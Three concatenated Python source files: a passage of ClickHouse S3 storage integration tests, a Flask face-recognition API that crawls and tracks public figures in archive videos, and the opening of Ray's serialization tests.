    other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
    query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
        "invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
    assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
    pytest.param("''", id="1_argument"),
    pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
    """The S3 engine must reject a wrong number of arguments with code 42."""
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    expected_err_msg = "Code: 42"  # NUMBER_OF_ARGUMENTS_DOESNT_MATCH

    query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
    assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
    """Insert 1001 one-row files from ~30 parallel threads, then read them
    all back with a single glob query."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    values = "(1, 1, 1)"
    nights_per_job = 1001 // 30  # ~33 files per worker thread
    jobs = []
    for night in range(0, 1001, nights_per_job):
        def add_tales(start, end):
            for i in range(start, end):
                path = "night_{}/tale.csv".format(i)
                query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
                    started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
                run_query(instance, query)

        # The range is bound through args (not the closure), which avoids
        # the late-binding pitfall; removed the unused `max_path` local.
        jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
        jobs[-1].start()

    for job in jobs:
        job.join()

    query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
    assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
    """Copy the mock S3 HTTP servers into the resolver container, start
    them detached, and wait until each answers its health check."""
    logging.info("Starting s3 mocks")
    # (script, container, port) for each mock server.
    mocks = (
        ("mock_s3.py", "resolver", "8080"),
        ("unstable_server.py", "resolver", "8081"),
        ("echo.py", "resolver", "8082"),
    )
    for mock_filename, container, port in mocks:
        container_id = started_cluster.get_container_id(container)
        current_dir = os.path.dirname(__file__)
        started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
        started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)

    # Wait for S3 mocks to start: poll each server (up to num_attempts
    # times, 1s apart) until a curl to its root returns 'OK'.
    for mock_filename, container, port in mocks:
        num_attempts = 100
        for attempt in range(num_attempts):
            ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
                                                             ["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
            if ping_response != 'OK':
                if attempt == num_attempts - 1:
                    # Out of retries: fail loudly with the last response.
                    assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
                else:
                    time.sleep(1)
            else:
                logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
                break

    logging.info("S3 mocks started")
def replace_config(old, new, config_path=None):
    """Replace every occurrence of ``old`` with ``new`` in a config file.

    Args:
        old: substring to replace on each line.
        new: replacement substring.
        config_path: file to rewrite; defaults to the module-level
            CONFIG_PATH (the dummy instance's defaultS3.xml).
    """
    path = CONFIG_PATH if config_path is None else config_path
    # Read-modify-write with context managers so the handles are closed
    # even if an error occurs mid-way.
    with open(path, 'r') as config:
        config_lines = [line.replace(old, new) for line in config]
    with open(path, 'w') as config:
        config.writelines(config_lines)
def test_custom_auth_headers(started_cluster):
    """Auth headers configured in defaultS3.xml are attached to S3
    requests and can be changed via SYSTEM RELOAD CONFIG."""
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    filename = "test.csv"
    get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
        bucket=started_cluster.minio_restricted_bucket,
        file=filename,
        table_format=table_format)

    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    result = run_query(instance, get_query)
    assert result == '1\t2\t3\n'

    instance.query(
        "CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
            bucket=started_cluster.minio_restricted_bucket,
            file=filename,
            table_format=table_format
        ))
    assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'

    # Break the configured token and reload: the query must start failing.
    replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
    instance.query("SYSTEM RELOAD CONFIG")
    ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
    assert ret == "" and err != ""
    # Restore the valid token and verify the query recovers.
    replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
    instance.query("SYSTEM RELOAD CONFIG")
    assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(started_cluster):
    """Paths excluded from the custom auth headers must be rejected with a
    403-style error (ClickHouse return code 243)."""
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    filename = "test.csv"
    # BUG FIX: the URL contained the literal placeholder artifact "(unknown)";
    # restore the intended {filename} substitution.
    get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    with pytest.raises(helpers.client.QueryRuntimeException) as ei:
        result = run_query(instance, get_query)
        print(result)
    assert ei.value.returncode == 243
    assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
    """A bucket that keeps redirecting to itself must be rejected instead of
    looping forever, with an error mentioning the redirect limit."""
    bucket = "redirected"
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    filename = "test.csv"
    # Restores the {filename} placeholder that was garbled to "(unknown)".
    get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    # pytest.raises replaces the manual try/except/finally flag dance and
    # still fails the test when no exception is raised at all.
    with pytest.raises(Exception, match="Too many redirects while trying to access"):
        run_query(instance, get_query)
@pytest.mark.parametrize("extension,method", [
    pytest.param("bin", "gzip", id="bin"),
    pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
    """SELECT through the S3 engine must transparently gunzip objects, both
    with an explicit 'gzip' method and 'auto' detection by extension."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]
    filename = f"test_get_gzip.{extension}"
    name = f"test_get_gzip_{extension}"
    data = [
        "Sophia Intrieri,55",
        "Jack Taylor,71",
        "Christopher Silva,66",
        "Clifton Purser,35",
        "Richard Aceuedo,43",
        "Lisa Hensley,31",
        "Alice Wehrley,1",
        "Mary Farmer,47",
        "Samara Ramirez,19",
        "Shirley Lloyd,51",
        "Santos Cowger,0",
        "Richard Mundt,88",
        "Jerry Gonzalez,15",
        "Angela James,10",
        "Norman Ortega,33",
        ""
    ]
    buf = io.BytesIO()
    # Compress in memory; GzipFile must be closed to flush the gzip trailer.
    compressed = gzip.GzipFile(fileobj=buf, mode="wb")
    compressed.write(("\n".join(data)).encode())
    compressed.close()
    put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())

    # The URL previously contained the artifact "(unknown)"; use {filename}
    # so the table reads the object uploaded above.
    run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
                   'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
                   'CSV',
                   '{method}')""")

    # BUG FIX: the comparison result was previously discarded; assert it.
    assert run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
    """Reading through the flaky proxy (port 8081) must survive transient
    failures and still return the complete, correct aggregates."""
    instance = started_cluster.instances["dummy"]
    table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
    get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
    assert run_query(instance, get_query).splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
    """INSERT through the S3 engine without compression must store plain CSV
    whose ids sum to the same total the engine reports back."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]
    filename = "test_put_uncompressed.bin"
    name = "test_put_uncompressed"
    data = [
        "'Gloria Thompson',99",
        "'Matthew Tang',98",
        "'Patsy Anderson',23",
        "'Nancy Badillo',93",
        "'Roy Hunt',5",
        "'Adam Kirk',51",
        "'Joshua Douds',28",
        "'Jolene Ryan',0",
        "'Roxanne Padilla',50",
        "'Howard Roberts',41",
        "'Ricardo Broughton',13",
        "'Roland Speer',83",
        "'Cathy Cohan',58",
        "'Kathie Dawson',100",
        "'Gregg Mcquistion',11",
    ]
    run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
        name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))

    run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))

    # BUG FIX: the comparison result was previously discarded; assert it.
    assert run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]

    # Cross-check against the raw object stored in minio.
    uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
    assert sum([int(i.split(',')[1]) for i in uncompressed_content.splitlines()]) == 753
@pytest.mark.parametrize("extension,method", [
    pytest.param("bin", "gzip", id="bin"),
    pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
    """INSERT through the S3 engine with gzip compression must store a valid
    gzip object whose decompressed content matches the inserted rows."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]
    filename = f"test_put_gzip.{extension}"
    name = f"test_put_gzip_{extension}"
    data = [
        "'Joseph Tomlinson',5",
        "'Earnest Essary',44",
        "'Matha Pannell',24",
        "'Michael Shavers',46",
        "'Elias Groce',38",
        "'Pamela Bramlet',50",
        "'Lewis Harrell',49",
        "'Tamara Fyall',58",
        "'George Dixon',38",
        "'Alice Walls',49",
        "'Paula Mais',24",
        "'Myrtle Pelt',93",
        "'Sylvia Naffziger',18",
        "'Amanda Cave',83",
        "'Yolanda Joseph',89"
    ]
    # The URL previously contained the artifact "(unknown)"; use {filename}
    # so the object written is the one fetched and gunzipped below.
    run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
                   'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
                   'CSV',
                   '{method}')""")

    run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")

    # BUG FIX: the comparison result was previously discarded; assert it.
    assert run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]

    # The stored object must be gzip and decode to the same totals.
    buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
    f = gzip.GzipFile(fileobj=buf, mode="rb")
    uncompressed_content = f.read().decode()
    assert sum([int(i.split(',')[1]) for i in uncompressed_content.splitlines()]) == 708
def test_truncate_table(started_cluster):
    """TRUNCATE on an S3-backed table must delete the bucket objects and
    leave the table readable but empty."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    name = "truncate"

    instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
        name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))

    instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
    result = instance.query("SELECT * FROM {}".format(name))
    assert result == instance.query("SELECT number FROM numbers(10)")
    instance.query("TRUNCATE TABLE {}".format(name))

    minio = started_cluster.minio_client
    # Object removal is asynchronous: poll up to 30 s for the prefix to empty.
    timeout = 30
    while timeout > 0:
        if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
            # BUG FIX: was `return`, which skipped the final assertions on
            # every successful run; `break` lets them execute.
            break
        timeout -= 1
        time.sleep(1)
    assert len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0
    assert instance.query("SELECT * FROM {}".format(name)) == ""
|
server.py | import datetime
import os
import json
import time
from threading import Thread
from flask import Flask, request, jsonify, Response, send_from_directory
from flask_cors import CORS
from flask_restx import Api, Resource
from werkzeug.middleware.proxy_fix import ProxyFix
from src import *
from src.connectors import antract_connector as antract
from src.utils import utils, uri_utils
from bson.json_util import dumps
TRAINING_IMG = 'data/training_img_aligned/'
IMG_DIR = os.path.join(os.getcwd(), TRAINING_IMG)
VIDEO_DIR = os.path.join(os.getcwd(), 'video')
os.makedirs('database', exist_ok=True)
database.init()
flask_app = Flask(__name__)
flask_app.wsgi_app = ProxyFix(flask_app.wsgi_app, x_proto=1, x_port=1, x_for=1, x_host=1, x_prefix=1)
api = Api(app=flask_app,
version="0.1.0",
default='facerec',
title="Face Recognition Api",
description="Recognise celebrities on videos.", )
CORS(flask_app)
PROJECTS = [p for p in os.listdir(TRAINING_IMG) if os.path.isdir(os.path.join(TRAINING_IMG, p))]
project_param = {'description': 'The project context of the call', 'enum': PROJECTS, 'required': True}
def now():
    """Current local time rendered as an ISO-8601 string (response timestamps)."""
    current = datetime.datetime.now()
    return current.isoformat()
@api.route('/projects')
@api.doc(description="Get list of active projects.")
class Projects(Resource):
    """Expose the list of configured projects."""

    def get(self):
        # PROJECTS is computed once at import time from the training folders.
        return jsonify(PROJECTS)
@api.route('/training-set')
@api.doc(description="Get list of training images with classes.",
         params={'project': project_param})
class TrainingSet(Resource):
    """Return the training images of a project, grouped by class."""

    def get(self):
        dataset = request.args.get('project', 'general')
        folder = os.path.join(TRAINING_IMG, dataset)
        labels, paths = utils.fetch_dataset(folder)
        grouped = {}
        for img_path, label in zip(paths, labels):
            # Rewrite the on-disk prefix into the URL prefix served by send_img.
            web_path = img_path.replace(TRAINING_IMG, 'training_img_aligned/')
            entry = grouped.setdefault(label, {'class': label, 'path': []})
            entry['path'].append(web_path)
        return jsonify(list(grouped.values()))
# Examples:
# http://127.0.0.1:5000/crawler?project=antract&q=Charles De Gaulle;Vincent Auriol;Pierre Mendès France;Georges Bidault;Guy Mollet;François Mitterrand;Georges Pompidou;Elisabeth II;Konrad Adenauer;Dwight Eisenhower;Nikita Khrouchtchev;Viatcheslav Molotov;Ahmed Ben Bella
# http://127.0.0.1:5000/crawler?project=memad&q=Annastiina Heikkilä;Frans Timmermans;Manfred Weber;Markus Preiss;Ska Keller;Emilie Tran Nguyen;Jan Zahradil;Margrethe Vestager;Nico Cué;Laura Huhtasaari;Asseri Kinnunen
@api.route('/crawler')
@api.doc(
    description="Search faces of people in the web to be added to the dataset.",
    params={
        'q': {
            'required': True,
            'description': 'The name of the person, or multiple individuals separated by a semicolon, '
                           'like in "Tom Hanks;Monica Bellucci"'},
        'project': project_param
    })
class Crawler(Resource):
    """Crawl the web for face images of the requested people."""

    def get(self):
        start_time = time.time()
        q = request.args.get('q')
        if q is None:
            # Turned into a 422 JSON response by the ValueError errorhandler.
            raise ValueError('Missing required parameter: q')
        project = request.args.get('project', default='general')
        for keyword in q.split(';'):
            crawler.main(keyword, max_num=30, project=project)
        return jsonify({
            'task': 'crawl',
            'time': now(),
            'execution_time': (time.time() - start_time),
            'status': 'ok'
        })
@api.route('/train/<string:project>')
@api.doc(description="Trigger the training of the model")
class Training(Resource):
    """Retrain the face classifier for one project."""

    def get(self, project):
        started = time.time()
        # SVM is the only classifier used here; disabled images are skipped.
        classifier.main(classifier='SVM', project=project, discard_disabled="true")
        return jsonify({
            'task': 'train',
            'time': now(),
            'execution_time': (time.time() - started),
            'status': 'ok'
        })
# http://127.0.0.1:5000/track?speedup=25&video=video/yle_a-studio_8a3a9588e0f58e1e40bfd30198274cb0ce27984e.mp4
# http://127.0.0.1:5000/track?format=ttl&video=http://data.memad.eu/yle/a-studio/8a3a9588e0f58e1e40bfd30198274cb0ce27984e
@api.route('/track')
@api.doc(description="Extract from the video all the continuous positions of the people in the dataset",
         params={
             'video': {'required': True, 'description': 'URI of the video to be analysed'},
             'project': project_param,
             'speedup': {'default': 25, 'type': int,
                         'description': 'Number of frame to wait between two iterations of the algorithm'},
             'no_cache': {'type': bool, 'default': False,
                          'description': 'Set it if you want to recompute the annotations'},
             'format': {'default': 'json', 'enum': ['json', 'ttl'], 'description': 'Set the output format'},
         })
class Track(Resource):
    def get(self):
        """Return (or start computing) face tracks for a video.

        If cached results exist they are clustered and returned; otherwise a
        background tracking thread is started and the current record
        (status RUNNING) is returned for the client to poll.
        """
        video_id = request.args.get('video').strip()
        project = request.args.get('project').strip()
        speedup = request.args.get('speedup', type=int, default=25)
        # Any present value other than the literal 'false' means "no cache".
        no_cache = 'no_cache' in request.args.to_dict() and request.args.get('no_cache') != 'false'
        video = None
        locator = video_id
        if not no_cache:
            video = database.get_all_about(video_id, project)
            if video:
                locator = video['locator']
        # NOTE(review): `and` binds tighter than `or`, so this reads as
        # `not video or ('tracks' not in video and status != 'RUNNING')` —
        # presumably intended; confirm before restructuring.
        need_run = not video or 'tracks' not in video and video.get('status') != 'RUNNING'
        if not video or need_run:
            if video_id.startswith('http'):  # it is a uri!
                locator, video = uri_utils.uri2video(video_id)
                video_id = video['locator']
            elif not os.path.isfile(video_id):
                raise FileNotFoundError('video not found: %s' % video_id)
            else:
                video = {'locator': video_id}
            database.save_metadata(video)
        if need_run:
            database.clean_analysis(video_id, project)
            database.save_status(video_id, project, 'RUNNING')
            video['status'] = 'RUNNING'
            # Heavy tracking happens off-request; clients poll this endpoint.
            Thread(target=run_tracker, args=(locator, speedup, video_id, project)).start()
        elif 'tracks' in video and len(video['tracks']) > 0:
            # Cached raw tracks: cluster/merge them before returning.
            raw_tracks = clusterize.from_dict(video['tracks'])
            video['tracks'] = clusterize.main(raw_tracks, confidence_threshold=0, merge_cluster=True)
            assigned_tracks = [t['merged_tracks'] for t in video['tracks']]
            if 'feat_clusters' in video:
                video['feat_clusters'] = clusterize.unknown_clusterise(video['feat_clusters'], assigned_tracks,
                                                                      raw_tracks)
        if '_id' in video:
            del video['_id']  # the database id should not appear on the output
        fmt = request.args.get('format')
        if fmt == 'ttl':
            return Response(semantifier.semantify(video), mimetype='text/turtle')
        return jsonify(video)
def run_tracker(video_path, speedup, video, project):
    """Background entry point: run the face tracker on one video.

    Args:
        video_path: local path or resolved locator of the media file.
        speedup: frames skipped between algorithm iterations.
        video: video id used as the database key for status updates.
        project: project whose face model is applied.
    """
    try:
        return tracker.main(video_path, project=project, video_speedup=speedup, export_frames=True, video_id=video)
    except Exception:
        # Broadened from RuntimeError: any failure must flip the status,
        # otherwise the record stays 'RUNNING' forever and is never retried.
        database.save_status(video, project, 'ERROR')
@flask_app.route('/get_locator')
def send_video():
    """Resolve the video parameter to a remote locator or serve a local file."""
    path = request.args.get('video')
    if not path.startswith('http'):
        return send_from_directory(VIDEO_DIR, path, as_attachment=True)
    video_path, info = uri_utils.uri2video(path)
    return video_path
@flask_app.route('/get_metadata')
def get_metadata():
    """Return INA metadata for an ina.fr video URI, or JSON null otherwise.

    BUG FIX: the previous version returned bare None for non-INA paths, and a
    Flask view returning None raises a TypeError (HTTP 500); answer with an
    explicit JSON null instead so clients get a well-formed response.
    """
    path = request.args.get('video')
    if path.startswith('http://www.ina.fr/'):
        return jsonify(antract.get_metadata_for(path)[0])
    return jsonify(None)
@flask_app.route('/appearance/<string:person>')
def get_appearances(person):
    """List the videos of a project in which *person* appears."""
    project = request.args.get('project')
    videos = database.get_video_with(person, project)
    # bson's dumps handles ObjectId & friends; round-trip back to plain JSON.
    return jsonify(json.loads(dumps(videos)))
@flask_app.route('/training_img_aligned/<path:subpath>')
def send_img(subpath=None):
    """Serve one aligned training image from IMG_DIR."""
    directory, image_name = os.path.split(subpath)
    return send_from_directory(os.path.join(IMG_DIR, directory), image_name, as_attachment=True)
@api.route('/disabled/<string:project>')
class Disabled(Resource):
    """Read/write the per-project list of disabled training images."""

    def get(self, project):
        """Return the disabled list; fall back to automatic outlier detection
        when no manual list exists yet."""
        disabled_file = os.path.join(TRAINING_IMG, project, 'disabled.txt')
        if not os.path.isfile(disabled_file):
            # automatic disable
            return jsonify(classifier.get_outlier_list(project))
        with open(disabled_file) as f:
            dis = f.read().split('\n')
        return jsonify(dis)

    def post(self, project):
        """Overwrite the disabled list with the posted JSON array, one path
        per line (a trailing newline is written, matching the old format)."""
        data = request.json
        disabled_file = os.path.join(TRAINING_IMG, project, 'disabled.txt')
        # BUG FIX: removed the redundant f.close() that sat inside the `with`
        # block (the context manager already closes the handle).
        with open(disabled_file, 'w') as f:
            f.writelines('%s\n' % x for x in data)
        return 'ok'
@api.errorhandler(ValueError)
def handle_invalid_usage(error):
    """Map ValueError raised by endpoints onto a 422 JSON error payload."""
    payload = {
        'status': 'error',
        'error': str(error),
        'time': now()
    }
    response = jsonify(payload)
    response.status_code = 422
    return response
if __name__ == '__main__':
    # Development entry point; production should run behind a WSGI server.
    flask_app.run()
|
test_basic.py | # coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import glob
import io
import json
import logging
from multiprocessing import Process
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.tests.cluster_utils
import ray.tests.utils
from ray.tests.utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
    """Round-trip primitive, collection and numpy-scalar values through both
    ray.put/ray.get and a remote call, checking value and type preservation
    (numpy scalars are exempt from the type check, see TODO below)."""
    primitive_objects = [
        # Various primitive types.
        0,
        0.0,
        0.9,
        1 << 62,
        1 << 999,
        "a",
        string.printable,
        "\u262F",
        u"hello world",
        u"\xff\xfe\x9c\x001\x000\x00",
        None,
        True,
        False,
        [],
        (),
        {},
        type,
        int,
        set(),
        # Collections types.
        collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
        collections.OrderedDict([("hello", 1), ("world", 2)]),
        collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
        collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
        collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
        # Numpy dtypes.
        np.int8(3),
        np.int32(4),
        np.int64(5),
        np.uint8(3),
        np.uint32(4),
        np.uint64(5),
        np.float32(1.9),
        np.float64(1.9),
    ]

    if sys.version_info < (3, 0):
        primitive_objects.append(long(0))  # noqa: E501,F821

    # Wrap every primitive in a list, a tuple and a dict value.
    composite_objects = (
        [[obj]
         for obj in primitive_objects] + [(obj, )
                                          for obj in primitive_objects] + [{
                                              (): obj
                                          } for obj in primitive_objects])

    @ray.remote
    def f(x):
        return x

    # Check that we can pass arguments by value to remote functions and
    # that they are uncorrupted.
    for obj in primitive_objects + composite_objects:
        new_obj_1 = ray.get(f.remote(obj))
        new_obj_2 = ray.get(ray.put(obj))
        assert obj == new_obj_1
        assert obj == new_obj_2
        # TODO(rkn): The numpy dtypes currently come back as regular integers
        # or floats.
        if type(obj).__module__ != "numpy":
            assert type(obj) == type(new_obj_1)
            assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
    """Exhaustively round-trip nested, custom-class, namedtuple, dataclass and
    numpy-bearing objects through ray.put/get and a remote call, using a
    structural equality helper."""

    def assert_equal(obj1, obj2):
        # Structural equality: numpy values via np.testing, objects with a
        # __dict__ field-by-field, containers and namedtuples recursively,
        # everything else with plain ==.
        module_numpy = (type(obj1).__module__ == np.__name__
                        or type(obj2).__module__ == np.__name__)
        if module_numpy:
            empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
                           or (hasattr(obj2, "shape") and obj2.shape == ()))
            if empty_shape:
                # This is a special case because currently
                # np.testing.assert_equal fails because we do not properly
                # handle different numerical types.
                assert obj1 == obj2, ("Objects {} and {} are "
                                      "different.".format(obj1, obj2))
            else:
                np.testing.assert_equal(obj1, obj2)
        elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
            special_keys = ["_pytype_"]
            assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
                list(obj2.__dict__.keys()) + special_keys)), (
                    "Objects {} and {} are different.".format(obj1, obj2))
            for key in obj1.__dict__.keys():
                if key not in special_keys:
                    assert_equal(obj1.__dict__[key], obj2.__dict__[key])
        elif type(obj1) is dict or type(obj2) is dict:
            assert_equal(obj1.keys(), obj2.keys())
            for key in obj1.keys():
                assert_equal(obj1[key], obj2[key])
        elif type(obj1) is list or type(obj2) is list:
            assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
                                            "different lengths.".format(
                                                obj1, obj2))
            for i in range(len(obj1)):
                assert_equal(obj1[i], obj2[i])
        elif type(obj1) is tuple or type(obj2) is tuple:
            assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
                                            "with different lengths.".format(
                                                obj1, obj2))
            for i in range(len(obj1)):
                assert_equal(obj1[i], obj2[i])
        elif (ray.serialization.is_named_tuple(type(obj1))
              or ray.serialization.is_named_tuple(type(obj2))):
            assert len(obj1) == len(obj2), (
                "Objects {} and {} are named "
                "tuples with different lengths.".format(obj1, obj2))
            for i in range(len(obj1)):
                assert_equal(obj1[i], obj2[i])
        else:
            assert obj1 == obj2, "Objects {} and {} are different.".format(
                obj1, obj2)

    if sys.version_info >= (3, 0):
        long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
    else:
        long_extras = [
            long(0),  # noqa: E501,F821
            np.array([
                ["hi", u"hi"],
                [1.3, long(1)]  # noqa: E501,F821
            ])
        ]

    PRIMITIVE_OBJECTS = [
        0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
        string.printable, "\u262F", u"hello world",
        u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
        np.int8(3),
        np.int32(4),
        np.int64(5),
        np.uint8(3),
        np.uint32(4),
        np.uint64(5),
        np.float32(1.9),
        np.float64(1.9),
        np.zeros([100, 100]),
        np.random.normal(size=[100, 100]),
        np.array(["hi", 3]),
        np.array(["hi", 3], dtype=object)
    ] + long_extras

    COMPLEX_OBJECTS = [
        [[[[[[[[[[[[]]]]]]]]]]]],
        {
            "obj{}".format(i): np.random.normal(size=[100, 100])
            for i in range(10)
        },
        # {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
        #       (): {(): {}}}}}}}}}}}}},
        (
            (((((((((), ), ), ), ), ), ), ), ), ),
        {
            "a": {
                "b": {
                    "c": {
                        "d": {}
                    }
                }
            }
        },
    ]

    class Foo(object):
        def __init__(self, value=0):
            self.value = value

        def __hash__(self):
            return hash(self.value)

        def __eq__(self, other):
            return other.value == self.value

    class Bar(object):
        def __init__(self):
            # One attribute per primitive/complex object.
            for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
                setattr(self, "field{}".format(i), val)

    class Baz(object):
        def __init__(self):
            self.foo = Foo()
            self.bar = Bar()

        def method(self, arg):
            pass

    class Qux(object):
        def __init__(self):
            self.objs = [Foo(), Bar(), Baz()]

    class SubQux(Qux):
        def __init__(self):
            Qux.__init__(self)

    class CustomError(Exception):
        pass

    Point = collections.namedtuple("Point", ["x", "y"])
    NamedTupleExample = collections.namedtuple(
        "Example", "field1, field2, field3, field4, field5")

    CUSTOM_OBJECTS = [
        Exception("Test object."),
        CustomError(),
        Point(11, y=22),
        Foo(),
        Bar(),
        Baz(),  # Qux(), SubQux(),
        NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
    ]

    # Test dataclasses in Python 3.7.
    if sys.version_info >= (3, 7):
        from dataclasses import make_dataclass

        DataClass0 = make_dataclass("DataClass0", [("number", int)])

        CUSTOM_OBJECTS.append(DataClass0(number=3))

        class CustomClass(object):
            def __init__(self, value):
                self.value = value

        DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])

        class DataClass2(DataClass1):
            @classmethod
            def from_custom(cls, data):
                custom = CustomClass(data)
                return cls(custom)

            def __reduce__(self):
                return (self.from_custom, (self.custom.value, ))

        CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))

    BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS

    LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
    TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
    # The check that type(obj).__module__ != "numpy" should be unnecessary, but
    # otherwise this seems to fail on Mac OS X on Travis.
    DICT_OBJECTS = ([{
        obj: obj
    } for obj in PRIMITIVE_OBJECTS if (
        obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
            0: obj
        } for obj in BASE_OBJECTS] + [{
            Foo(123): Foo(456)
        }])

    RAY_TEST_OBJECTS = (
        BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)

    @ray.remote
    def f(x):
        return x

    # Check that we can pass arguments by value to remote functions and
    # that they are uncorrupted.
    for obj in RAY_TEST_OBJECTS:
        assert_equal(obj, ray.get(f.remote(obj)))
